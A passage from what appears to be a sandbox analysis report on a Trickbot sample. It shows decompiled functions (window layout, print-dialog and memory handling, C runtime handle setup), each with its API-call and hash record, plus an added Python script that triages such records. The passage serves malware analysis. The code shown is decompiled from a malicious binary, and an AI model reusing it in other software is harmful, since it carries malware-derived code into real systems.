                            • Part of subcall function 0042A5EE: PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0042A60B
                            • Part of subcall function 0042A5EE: GetMessageA.USER32(0000000F,00000000,0000000F,0000000F), ref: 0042A619
                            • Part of subcall function 0042A5EE: DispatchMessageA.USER32(?), ref: 0042A62C
                            • Part of subcall function 0042A5EE: SetRectEmpty.USER32(?), ref: 0042A655
                            • Part of subcall function 0042A5EE: GetDesktopWindow.USER32 ref: 0042A66D
                            • Part of subcall function 0042A5EE: LockWindowUpdate.USER32(?), ref: 0042A67E
                            • Part of subcall function 0042A5EE: GetDCEx.USER32(?,00000000,00000003), ref: 0042A695
                            • Part of subcall function 00421402: GetModuleHandleA.KERNEL32(GDI32.DLL,?,00429D3A), ref: 0042140A
                            • Part of subcall function 00421402: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 00421416
                          • GetWindowRect.USER32(?,?), ref: 00429D5D
                            • Part of subcall function 00421438: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,00429D47,00000000), ref: 00421441
                            • Part of subcall function 00421438: GetProcAddress.KERNEL32(00000000,SetLayout,?,?,00429D47,00000000), ref: 0042144F
                          • GetWindowRect.USER32(?,?), ref: 00429E4A
                            • Part of subcall function 00429C4E: OffsetRect.USER32(?,?,?), ref: 00429C85
                            • Part of subcall function 0042A062: OffsetRect.USER32(?,?,?), ref: 0042A08B
                            • Part of subcall function 0042A062: OffsetRect.USER32(?,?,?), ref: 0042A095
                            • Part of subcall function 0042A062: OffsetRect.USER32(?,?,?), ref: 0042A09F
                            • Part of subcall function 0042A062: OffsetRect.USER32(?,?,?), ref: 0042A0A9
                            • Part of subcall function 0042A9BF: GetCapture.USER32 ref: 0042A9D0
                            • Part of subcall function 0042A9BF: SetCapture.USER32(?), ref: 0042A9E0
                            • Part of subcall function 0042A9BF: GetCapture.USER32 ref: 0042A9EC
                            • Part of subcall function 0042A9BF: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0042AA06
                            • Part of subcall function 0042A9BF: DispatchMessageA.USER32(?), ref: 0042AA38
                            • Part of subcall function 0042A9BF: GetCapture.USER32 ref: 0042AA96
                          • GetWindowRect.USER32(?,?), ref: 00429EF7
                          • InflateRect.USER32(?,00000002,00000002), ref: 00429FFA
                          • InflateRect.USER32(?,00000002,00000002), ref: 0042A00D
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Rect$MessageOffsetWindow$Capture$AddressDispatchHandleInflateModuleProc$DesktopEmptyLockPeekUpdate
                          • String ID:
                          • API String ID: 2041477333-0
                          • Opcode ID: d3cf26c2436fce6822bf8107be96c29d7597f3932fe5dec81f97b2943589c066
                          • Instruction ID: 72b4e11711a5a85c3a3e078067ac1a4e9571446fc90aa547d006c906365034d3
                          • Opcode Fuzzy Hash: d3cf26c2436fce6822bf8107be96c29d7597f3932fe5dec81f97b2943589c066
                          • Instruction Fuzzy Hash: 41D13771A006189FCF05CF98C880ADEBBB6AF49310F1581AAED05BB255D7B1AE45CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E00425EDA(intOrPtr* __ecx) {
                          				long _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				long _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				intOrPtr _v40;
                          				char _v44;
                          				struct tagRECT _v60;
                          				struct HDWP__* _v92;
                          				intOrPtr _t163;
                          				void* _t181;
                          				void* _t187;
                          				signed int _t191;
                          				intOrPtr _t198;
                          				void* _t207;
                          				void* _t209;
                          				intOrPtr _t210;
                          				intOrPtr _t237;
                          				signed int _t245;
                          				intOrPtr _t248;
                          				signed int _t250;
                          				signed int _t251;
                          				intOrPtr* _t255;
                          
                          0x00425ee6				_t255 = __ecx;
                          0x00425eec				GetClientRect( *(__ecx + 0x1c),  &_v60);
                          0x00425f02				InflateRect( &_v60,  ~( *(_t255 + 0x60)),  ~( *(_t255 + 0x64)));
                          0x00425f10				 *((intOrPtr*)( *_t255 + 0x100))( &_v44);
                          0x00425f26				E00425C7C( *((intOrPtr*)(_t255 + 0x78)),  *((intOrPtr*)(_t255 + 0x6c)), _v36 - _v44,  *((intOrPtr*)(_t255 + 0x58)));
                          0x00425f3b				E00425C7C( *((intOrPtr*)(_t255 + 0x7c)),  *((intOrPtr*)(_t255 + 0x68)), _v32 - _v40,  *((intOrPtr*)(_t255 + 0x5c)));
                          0x00425f59				_v92 = BeginDeferWindowPos(( *((intOrPtr*)(_t255 + 0x6c)) + 1) * ( *((intOrPtr*)(_t255 + 0x68)) + 1) + 1);
                          0x00425f5c				_t163 =  *0x44b358; // 0x0
                          0x00425f68				_t206 = _v60.bottom - _t163 - _v32;
                          0x00425f6b				_t245 = 0;
                          0x00425f70				_v24 = _v60.right - _t163 - _v36;
                          0x00425f73				_v20 = _v60.bottom - _t163 - _v32;
                          0x00425f76				if( *((intOrPtr*)(_t255 + 0x70)) != 0) {
                          0x00425f7f					if( *((intOrPtr*)(_t255 + 0x74)) != 0) {
                          0x00425f8f						_v8 = E0041B5B5(_t255, 0xea20);
                          0x00425f92						_t191 = E00425E44(_t255);
                          0x00425f9e						asm("sbb edi, edi");
                          0x00425fa2						_t254 =  ~( ~_t191);
                          0x00425fa8						asm("sbb eax, eax");
                          0x00425fba						if(E0041B6A3(_v8, 0x18, ( ~( ~( ~_t191)) & 0x00000008) + 8, 0) != 0) {
                          0x00425fc6							InvalidateRect( *(_v8 + 0x1c), 0, 1);
                          0x00425fc6						}
                          0x00425fd0						E0041B815(_v8, _t254);
                          0x00425fd5						_t198 =  *0x44b358; // 0x0
                          0x00425ff3						E00425D3C( &_v92, _v8, _t198 + _v36, _v32 + _t198, _v24, _t206, 1);
                          0x00425ff8						_t163 =  *0x44b358; // 0x0
                          0x00425ffd						_t245 = 0;
                          0x00425ffd					}
                          0x00426002					if( *((intOrPtr*)(_t255 + 0x70)) != _t245) {
                          0x00426007						_t251 = 0;
                          0x0042600b						_v28 =  *((intOrPtr*)(_t255 + 0x48)) + _t163;
                          0x00426011						_v8 = _v60.left;
                          0x0042601c						_v16 = _v32 + _t163;
                          0x0042601f						if( *((intOrPtr*)(_t255 + 0x6c)) > _t245) {
                          0x00426021							do {
                          0x00426021								_t47 = _t251 + 0xea00; // 0xea00
                          0x0042602a								_t187 = E0041B5B5(_t255, _t47);
                          0x00426037								_t210 =  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x78)) + 8 + (_t251 + _t251 * 2) * 4));
                          0x0042603b								if(_t251 == 0 &&  *((intOrPtr*)(_t255 + 0x6c)) <  *((intOrPtr*)(_t255 + 0x44))) {
                          0x00426045									_t237 = _v28;
                          0x00426048									_v8 = _v8 + _t237;
                          0x0042604b									_t210 = _t210 - _t237;
                          0x0042604b								}
                          0x0042605e								E00425D3C( &_v92, _t187, _v8, _v16, _t210, _v20, 1);
                          0x00426066								_v8 = _v8 + _t210 +  *((intOrPtr*)(_t255 + 0x58));
                          0x00426069								_t251 = _t251 + 1;
                          0x0042606a							} while (_t251 <  *((intOrPtr*)(_t255 + 0x6c)));
                          0x0042606f							_t163 =  *0x44b358; // 0x0
                          0x00426074							_t245 = 0;
                          0x00426074						}
                          0x0042601f					}
                          0x00426002				}
                          0x00426079				if( *((intOrPtr*)(_t255 + 0x74)) != _t245) {
                          0x00426081					_t209 =  *((intOrPtr*)(_t255 + 0x4c)) + _t163;
                          0x00426085					_v28 = _t163 + _v36;
                          0x0042608b					_t250 = 0;
                          0x00426090					_v8 = _v60.top;
                          0x00426093					if( *((intOrPtr*)(_t255 + 0x68)) > _t245) {
                          0x00426095						do {
                          0x00426095							_t74 = _t250 + 0xea10; // 0xea10
                          0x0042609e							_t181 = E0041B5B5(_t255, _t74);
                          0x004260af							_v12 =  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x7c)) + 8 + (_t250 + _t250 * 2) * 4));
                          0x004260b2							if(_t250 == 0 &&  *((intOrPtr*)(_t255 + 0x68)) <  *((intOrPtr*)(_t255 + 0x40))) {
                          0x004260bc								_v8 = _v8 + _t209;
                          0x004260bf								_v12 = _v12 - _t209;
                          0x004260bf							}
                          0x004260d5							E00425D3C( &_v92, _t181, _v28, _v8, _v24, _v12, 1);
                          0x004260e0							_v8 = _v8 +  *((intOrPtr*)(_t255 + 0x5c)) + _v12;
                          0x004260e3							_t250 = _t250 + 1;
                          0x004260e4						} while (_t250 <  *((intOrPtr*)(_t255 + 0x68)));
                          0x004260e9						_t245 = 0;
                          0x004260e9					}
                          0x00426093				}
                          0x004260f1				_v20 = _v60.left;
                          0x004260f4				_v12 = _t245;
                          0x004260f7				if( *((intOrPtr*)(_t255 + 0x6c)) > _t245) {
                          0x004260f9					_v24 = _t245;
                          0x004260fc					do {
                          0x00426102						_t207 = 0;
                          0x00426107						_t248 =  *((intOrPtr*)(_v24 +  *((intOrPtr*)(_t255 + 0x78)) + 8));
                          0x0042610e						_v8 = _v60.top;
                          0x00426111						if( *((intOrPtr*)(_t255 + 0x68)) > _t245) {
                          0x00426113							_v16 = _t245;
                          0x00426116							do {
                          0x00426126								_v28 =  *((intOrPtr*)(_v16 +  *((intOrPtr*)(_t255 + 0x7c)) + 8));
                          0x0042613f								E00425D3C( &_v92, E00424B00(_t255, _t207, _v12), _v20, _v8, _t248, _v28, 0);
                          0x00426147								_v16 = _v16 + 0xc;
                          0x0042614e								_v8 = _v8 +  *((intOrPtr*)(_t255 + 0x5c)) + _v28;
                          0x00426151								_t207 = _t207 + 1;
                          0x00426152							} while (_t207 <  *((intOrPtr*)(_t255 + 0x68)));
                          0x00426157							_t245 = 0;
                          0x00426157						}
                          0x0042615c						_v24 = _v24 + 0xc;
                          0x00426160						_v20 = _v20 + _t248 +  *((intOrPtr*)(_t255 + 0x58));
                          0x00426163						_v12 = _v12 + 1;
                          0x00426169					} while (_v12 <  *((intOrPtr*)(_t255 + 0x6c)));
                          0x004260fc				}
                          0x00426171				if(_v92 != _t245) {
                          0x00426176					EndDeferWindowPos(_v92);
                          0x0042617c					_t245 = 0;
                          0x0042617c				}
                          0x00426193				return  *((intOrPtr*)( *_t255 + 0x110))(_t245, _v36, _v32);
                                    			}

                          APIs
                          • GetClientRect.USER32(?,?), ref: 00425EEC
                          • InflateRect.USER32(?,?,?), ref: 00425F02
                          • BeginDeferWindowPos.USER32(?), ref: 00425F4D
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00425FC6
                          • EndDeferWindowPos.USER32(?), ref: 00426176
                            • Part of subcall function 0041B5B5: GetDlgItem.USER32(?,?), ref: 0041B5C3
                            • Part of subcall function 00425E44: GetClientRect.USER32(?,?), ref: 00425E65
                            • Part of subcall function 00425E44: GetParent.USER32(?), ref: 00425E7D
                            • Part of subcall function 00425E44: GetClientRect.USER32(?,?), ref: 00425EA7
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Rect$Client$DeferWindow$BeginInflateInvalidateItemParent
                          • String ID:
                          • API String ID: 939197390-0
                          • Opcode ID: 08313d4aa41f99e8e23b58f45aee9a0801ce46be4314a808e7737648b299fb2c
                          • Instruction ID: 2f33174862d9900589927dacb821746555d53b4f1962221192ff332719b8dc40
                          • Opcode Fuzzy Hash: 08313d4aa41f99e8e23b58f45aee9a0801ce46be4314a808e7737648b299fb2c
                          • Instruction Fuzzy Hash: A1A14971A00619EFCF15CFA9D9819AEBBF6FF48304F10882EE142A7660D734A981DF54
                          Uniqueness

                          Uniqueness Score: -1.00%
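
Every decompiled function on this page is followed by the same record: an APIs list (direct calls plus "Part of subcall function" calls), the Similarity fields (API ID, API String ID, Opcode ID, fuzzy hashes) and a Uniqueness score. Over several hundred such records the few worth reading are easy to miss, and two of the three functions here reach nothing but USER32 layout calls. The Python below is an added example written for this page, not Joe Sandbox code and not part of the sample under analysis: it parses the record layout shown here, collapses functions that share an Opcode ID (same code at another address), pulls out the symbol names passed to GetProcAddress, and ranks functions so that pure GUI plumbing sinks to the bottom. The embedded text is constructed from this page's records; the function names E00429D10 and E0043ABCD in it are hypothetical, and the scoring weights are an arbitrary heuristic. A GetProcAddress hit is a prompt, not a verdict: resolving GetLayout/SetLayout from GDI32.DLL at run time, as the first record above does, is also what ordinary GUI runtime libraries do to stay compatible with Windows versions that lack those exports, so such a function still needs a manual look.

```python
"""Triage helper for the per-function records of a Joe Sandbox HCA report (added example)."""
import re
from collections import defaultdict

# Constructed sample in the layout this report uses. Record 1 is copied from the E00425EDA
# record on this page. Records 2 and 3 use made-up names (E00429D10, E0043ABCD): record 2
# reuses the API list and hashes of the first record shown on this page, record 3 repeats
# record 1's Opcode ID to exercise duplicate collapsing.
SAMPLE = """\
C-Code - Quality: 97%
\t\t\tE00425EDA(intOrPtr* __ecx) {
\t\t\t\tGetClientRect( *(__ecx + 0x1c),  &_v60);
\t\t\t}
APIs
• GetClientRect.USER32(?,?), ref: 00425EEC
• InflateRect.USER32(?,?,?), ref: 00425F02
• BeginDeferWindowPos.USER32(?), ref: 00425F4D
• InvalidateRect.USER32(?,00000000,00000001), ref: 00425FC6
• EndDeferWindowPos.USER32(?), ref: 00426176
  • Part of subcall function 0041B5B5: GetDlgItem.USER32(?,?), ref: 0041B5C3
  • Part of subcall function 00425E44: GetParent.USER32(?), ref: 00425E7D
Memory Dump Source
• Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Rect$Client$DeferWindow$BeginInflateInvalidateItemParent
• String ID:
• API String ID: 939197390-0
• Opcode ID: 08313d4aa41f99e8e23b58f45aee9a0801ce46be4314a808e7737648b299fb2c
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%
\t\t\tE00429D10(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
\t\t\t}
APIs
  • Part of subcall function 0042A5EE: LockWindowUpdate.USER32(?), ref: 0042A67E
  • Part of subcall function 0042A5EE: GetDCEx.USER32(?,00000000,00000003), ref: 0042A695
  • Part of subcall function 00421402: GetModuleHandleA.KERNEL32(GDI32.DLL,?,00429D3A), ref: 0042140A
  • Part of subcall function 00421402: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 00421416
• GetWindowRect.USER32(?,?), ref: 00429D5D
  • Part of subcall function 00421438: GetProcAddress.KERNEL32(00000000,SetLayout,?,?,00429D47,00000000), ref: 0042144F
• InflateRect.USER32(?,00000002,00000002), ref: 00429FFA
Similarity
• API ID: Rect$MessageOffsetWindow$Capture$AddressDispatchHandleInflateModuleProc$DesktopEmptyLockPeekUpdate
• API String ID: 2041477333-0
• Opcode ID: d3cf26c2436fce6822bf8107be96c29d7597f3932fe5dec81f97b2943589c066
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 97%
\t\t\tE0043ABCD(intOrPtr* __ecx) {
\t\t\t}
APIs
• GetClientRect.USER32(?,?), ref: 0043ABD0
Similarity
• API String ID: 939197390-0
• Opcode ID: 08313d4aa41f99e8e23b58f45aee9a0801ce46be4314a808e7737648b299fb2c
Uniqueness

Uniqueness Score: -1.00%
"""

RECORD_HDR = re.compile(r"^C-Code - Quality: (\d+)%", re.M)
FUNC_SIG = re.compile(r"^[ \t]*(E[0-9A-F]{8})\(", re.M)      # first hit in a record is the signature
API_LINE = re.compile(
    r"^[ \t]*•[ \t]*(?:Part of subcall function (?P<callee>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<dll>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?(?:,? ref: (?P<ref>[0-9A-F]{8}))?", re.M)
FIELD = re.compile(r"^[ \t]*•[ \t]*(?P<key>[A-Za-z][A-Za-z ]*?):[ \t]?(?P<val>.*)$", re.M)
SCORE = re.compile(r"Uniqueness Score: (-?[0-9.]+)%")
GUI_DLLS = {"USER32", "GDI32", "COMCTL32"}


def parse_records(text):
    """Split report text at each 'C-Code - Quality' header; one dict per decompiled function."""
    starts = [m.start() for m in RECORD_HDR.finditer(text)]
    records = []
    for i, start in enumerate(starts):
        chunk = text[start:starts[i + 1] if i + 1 < len(starts) else len(text)]
        sig, score = FUNC_SIG.search(chunk), SCORE.search(chunk)
        records.append({
            "name": sig.group(1) if sig else None,
            "quality": int(RECORD_HDR.match(chunk).group(1)),
            "apis": [{"api": m["api"], "dll": m["dll"], "args": m["args"] or "",
                      "ref": m["ref"], "callee": m["callee"]} for m in API_LINE.finditer(chunk)],
            "fields": {m["key"]: m["val"].strip() for m in FIELD.finditer(chunk)},
            "uniqueness": float(score.group(1)) if score else None,
        })
    return records


def resolved_symbols(rec):
    """Second argument of every GetProcAddress call the function reaches (directly or via subcalls)."""
    names = []
    for call in rec["apis"]:
        parts = [p.strip() for p in call["args"].split(",")]
        if call["api"] == "GetProcAddress" and len(parts) >= 2 and parts[1] not in ("", "?"):
            names.append(parts[1])
    return names


def group_by_api_string_id(records):
    """Functions sharing an API String ID reach the same set of APIs; useful to spot library families."""
    groups = defaultdict(list)
    for rec in records:
        groups[rec["fields"].get("API String ID", "")].append(rec["name"])
    return dict(groups)


def triage(records):
    """Rank unique functions: dynamic import resolution first, then non-GUI DLL use, then the rest."""
    rows, seen = [], set()
    for rec in records:
        key = rec["fields"].get("Opcode ID") or rec["name"]
        if key in seen:                      # identical code already listed under another address
            continue
        seen.add(key)
        syms = resolved_symbols(rec)
        non_gui = sorted({c["dll"] for c in rec["apis"]} - GUI_DLLS)
        direct = [c["api"] for c in rec["apis"] if c["callee"] is None]
        score = 10 * len(syms) + 3 * len(non_gui) + (1 if direct else 0)   # arbitrary weights
        rows.append({"name": rec["name"], "score": score, "resolved": syms, "non_gui_dlls": non_gui,
                     "direct_apis": direct, "api_string_id": rec["fields"].get("API String ID", "")})
    return sorted(rows, key=lambda r: (-r["score"], r["name"]))


if __name__ == "__main__":
    for row in triage(parse_records(SAMPLE)):
        print(f'{row["name"]}  score={row["score"]:<3} resolved={row["resolved"]} '
              f'non_gui={row["non_gui_dlls"]} api_string_id={row["api_string_id"]}')
```

Run against a whole report, the ranking surfaces the handful of functions that resolve imports by name or touch KERNEL32/ADVAPI32/WS2_32, while the many Rect/Window records like the ones on this page collapse to the bottom of the list.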

                          C-Code - Quality: 91%
                          			E00435CD0(void* __ecx) {
                          				intOrPtr _t67;
                          				void* _t69;
                          				void* _t72;
                          				CHAR** _t77;
                          				intOrPtr _t90;
                          				signed int _t112;
                          				void* _t117;
                          				void* _t129;
                          				intOrPtr* _t132;
                          				signed short* _t134;
                          				intOrPtr* _t135;
                          				intOrPtr* _t136;
                          				void* _t137;
                          
                          				E00405340(E00438196, _t137);
                          				_t129 = __ecx;
                          				if( *((intOrPtr*)(_t137 + 8)) != 0) {
                          					L20:
                          					_push(0);
                          					_push(0x14000c);
                          					_push(1);
                          					E00415837(_t137 - 0x160);
                          					 *(_t137 - 4) = 2;
                          					E00415AA7(_t137 - 0x160);
                          					_t65 =  *((intOrPtr*)(_t129 + 0x94));
                          					if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
                          						E00422790(_t65);
                          					}
                          					_t66 =  *((intOrPtr*)(_t129 + 0x98));
                          					_t132 = _t129 + 0x98;
                          					if( *((intOrPtr*)(_t129 + 0x98)) != 0) {
                          						E00422790(_t66);
                          					}
                          					_t67 =  *((intOrPtr*)(_t137 - 0x104));
                          					 *(_t137 - 4) =  *(_t137 - 4) | 0xffffffff;
                          					 *((intOrPtr*)(_t129 + 0x94)) =  *((intOrPtr*)(_t67 + 8));
                          					 *_t132 =  *((intOrPtr*)(_t67 + 0xc));
                          					_t117 = _t137 - 0x160;
                          					L25:
                          					_t69 = E00417440(_t117);
                          					L26:
                          					 *[fs:0x0] =  *((intOrPtr*)(_t137 - 0xc));
                          					return _t69;
                          				}
                          				_t72 =  *(__ecx + 0x98);
                          				if(_t72 == 0) {
                          					goto L20;
                          				}
                          				_t69 = GlobalLock(_t72);
                          				_t134 = _t69;
                          				if((_t134[3] & 0x00000001) == 0) {
                          					goto L26;
                          				}
                          				_push(0);
                          				_push(0x14000c);
                          				_push(1);
                          				E00415837(_t137 - 0xbc);
                          				 *(_t137 - 4) = 0;
                          				E00415AA7(_t137 - 0xbc);
                          				if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc)) != 0) {
                          					_t77 = E004159EE(_t137 - 0xbc, _t137 - 0x10);
                          					 *(_t137 - 4) = 1;
                          					if(lstrcmpA(_t134 + ( *_t134 & 0x0000ffff),  *_t77) != 0) {
                          						L10:
                          						_t112 = 1;
                          						L11:
                          						 *(_t137 - 4) =  *(_t137 - 4) & 0x00000000;
                          						E00417EC8(_t137 - 0x10);
                          						if(_t112 == 0) {
                          							_t83 =  *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 8));
                          							if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 8)) != 0) {
                          								E00422790(_t83);
                          							}
                          							_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc));
                          							if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc)) != 0) {
                          								E00422790(_t85);
                          							}
                          						} else {
                          							_t88 =  *((intOrPtr*)(_t129 + 0x94));
                          							_t135 = _t129 + 0x94;
                          							if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
                          								E00422790(_t88);
                          							}
                          							E00422790( *((intOrPtr*)(_t129 + 0x98)));
                          							_t90 =  *((intOrPtr*)(_t137 - 0x60));
                          							 *_t135 =  *((intOrPtr*)(_t90 + 8));
                          							 *((intOrPtr*)(_t129 + 0x98)) =  *((intOrPtr*)(_t90 + 0xc));
                          						}
                          						L19:
                          						 *(_t137 - 4) =  *(_t137 - 4) | 0xffffffff;
                          						_t117 = _t137 - 0xbc;
                          						goto L25;
                          					}
                          					 *((char*)(_t137 + 0xb)) = lstrcmpA(_t134 + (_t134[1] & 0x0000ffff),  *(E00415A2B(_t137 - 0xbc, _t137 - 0x14))) != 0;
                          					E00417EC8(_t137 - 0x14);
                          					if( *((char*)(_t137 + 0xb)) != 0) {
                          						goto L10;
                          					}
                          					_t112 = lstrcmpA & 0xffffff00 | lstrcmpA(_t134 + (_t134[2] & 0x0000ffff),  *(E00415A69(_t137 - 0xbc, _t137 - 0x18))) != 0x00000000;
                          					E00417EC8(_t137 - 0x18);
                          					if(_t112 == 0) {
                          						goto L11;
                          					}
                          					goto L10;
                          				}
                          				_t105 =  *((intOrPtr*)(_t129 + 0x94));
                          				_t136 = _t129 + 0x94;
                          				if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
                          					E00422790(_t105);
                          				}
                          				E00422790( *((intOrPtr*)(_t129 + 0x98)));
                          				 *_t136 = 0;
                          				 *((intOrPtr*)(_t129 + 0x98)) = 0;
                          				goto L19;
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 00435CD5
                          • lstrcmpA.KERNEL32(00000000,00000000,00000001,0014000C,00000000), ref: 00435D89
                          • lstrcmpA.KERNEL32(?,00000000), ref: 00435DA7
                          • lstrcmpA.KERNEL32(?,00000000,?), ref: 00435DD5
                            • Part of subcall function 00422790: GlobalFlags.KERNEL32(?), ref: 0042279A
                            • Part of subcall function 00422790: GlobalUnlock.KERNEL32(?), ref: 004227B1
                            • Part of subcall function 00422790: GlobalFree.KERNEL32(?), ref: 004227BC
                          • GlobalLock.KERNEL32(?,?,?,00000000), ref: 00435CFF
                            • Part of subcall function 00415837: __EH_prolog.LIBCMT ref: 0041583C
                            • Part of subcall function 00415AA7: PrintDlgA.COMDLG32(?,00435E7F,00000001,0014000C,00000000,?,?,00000000), ref: 00415AB1
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Global$lstrcmp$H_prolog$FlagsFreeLockPrintUnlock
                          • String ID:
                          • API String ID: 2564375162-0
                          • Opcode ID: 9601935cd9b4bd5de86417a5fda57c69fbda64f6f4c4ce77f7bbef73c29ee8e6
                          • Instruction ID: d5b63fd21527c3633519b9647efd42377c1120a1cde25bf4170fca31900e56e5
                          • Opcode Fuzzy Hash: 9601935cd9b4bd5de86417a5fda57c69fbda64f6f4c4ce77f7bbef73c29ee8e6
                          • Instruction Fuzzy Hash: A7518C70A00B1AEBDB14EF75C985FDAB7B5AF08314F00445EE519A7252DB38EE84CB58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 99%
                          			E004092E2() {
                          				void** _v8;
                          				struct _STARTUPINFOA _v76;
                          				signed int* _t48;
                          				signed int _t50;
                          				long _t55;
                          				signed int _t57;
                          				signed int _t58;
                          				int _t59;
                          				signed char _t63;
                          				signed int _t65;
                          				void** _t67;
                          				int _t68;
                          				int _t69;
                          				signed int* _t70;
                          				int _t72;
                          				intOrPtr* _t73;
                          				signed int* _t75;
                          				void* _t76;
                          				void* _t84;
                          				void* _t87;
                          				int _t88;
                          				signed int* _t89;
                          				void** _t90;
                          				signed int _t91;
                          				int* _t92;
                          
                          				_t89 = E0040511B(0x480);
                          				if(_t89 == 0) {
                          					E004052AF(0x1b);
                          				}
                          				 *0x44cfa0 = _t89;
                          				 *0x44d0a0 = 0x20;
                          				_t1 =  &(_t89[0x120]); // 0x480
                          				_t48 = _t1;
                          				while(_t89 < _t48) {
                          					_t89[1] = _t89[1] & 0x00000000;
                          					 *_t89 =  *_t89 | 0xffffffff;
                          					_t89[2] = _t89[2] & 0x00000000;
                          					_t89[1] = 0xa;
                          					_t70 =  *0x44cfa0; // 0x1354ae8
                          					_t89 =  &(_t89[9]);
                          					_t48 =  &(_t70[0x120]);
                          				}
                          				GetStartupInfoA( &_v76);
                          				__eflags = _v76.cbReserved2;
                          				if(_v76.cbReserved2 == 0) {
                          					L25:
                          					_t72 = 0;
                          					__eflags = 0;
                          					do {
                          						_t75 =  *0x44cfa0; // 0x1354ae8
                          						_t50 = _t72 + _t72 * 8;
                          						__eflags = _t75[_t50] - 0xffffffff;
                          						_t90 =  &(_t75[_t50]);
                          						if(_t75[_t50] != 0xffffffff) {
                          							_t45 =  &(_t90[1]);
                          							 *_t45 = _t90[1] | 0x00000080;
                          							__eflags =  *_t45;
                          							goto L37;
                          						}
                          						__eflags = _t72;
                          						_t90[1] = 0x81;
                          						if(_t72 != 0) {
                          							asm("sbb eax, eax");
                          							_t55 =  ~(_t72 - 1) + 0xfffffff5;
                          							__eflags = _t55;
                          						} else {
                          							_t55 = 0xfffffff6;
                          						}
                          						_t87 = GetStdHandle(_t55);
                          						__eflags = _t87 - 0xffffffff;
                          						if(_t87 == 0xffffffff) {
                          							L33:
                          							_t90[1] = _t90[1] | 0x00000040;
                          						} else {
                          							_t57 = GetFileType(_t87);
                          							__eflags = _t57;
                          							if(_t57 == 0) {
                          								goto L33;
                          							}
                          							_t58 = _t57 & 0x000000ff;
                          							 *_t90 = _t87;
                          							__eflags = _t58 - 2;
                          							if(_t58 != 2) {
                          								__eflags = _t58 - 3;
                          								if(_t58 == 3) {
                          									_t90[1] = _t90[1] | 0x00000008;
                          								}
                          								goto L37;
                          							}
                          							goto L33;
                          						}
                          						L37:
                          						_t72 = _t72 + 1;
                          						__eflags = _t72 - 3;
                          					} while (_t72 < 3);
                          					return SetHandleCount( *0x44d0a0);
                          				}
                          				_t59 = _v76.lpReserved2;
                          				__eflags = _t59;
                          				if(_t59 == 0) {
                          					goto L25;
                          				}
                          				_t88 =  *_t59;
                          				_t73 = _t59 + 4;
                          				_v8 = _t73 + _t88;
                          				__eflags = _t88 - 0x800;
                          				if(_t88 >= 0x800) {
                          					_t88 = 0x800;
                          				}
                          				__eflags =  *0x44d0a0 - _t88; // 0x20
                          				if(__eflags >= 0) {
                          					L18:
                          					_t91 = 0;
                          					__eflags = _t88;
                          					if(_t88 <= 0) {
                          						goto L25;
                          					} else {
                          						goto L19;
                          					}
                          					do {
                          						L19:
                          						_t76 =  *_v8;
                          						__eflags = _t76 - 0xffffffff;
                          						if(_t76 == 0xffffffff) {
                          							goto L24;
                          						}
                          						_t63 =  *_t73;
                          						__eflags = _t63 & 0x00000001;
                          						if((_t63 & 0x00000001) == 0) {
                          							goto L24;
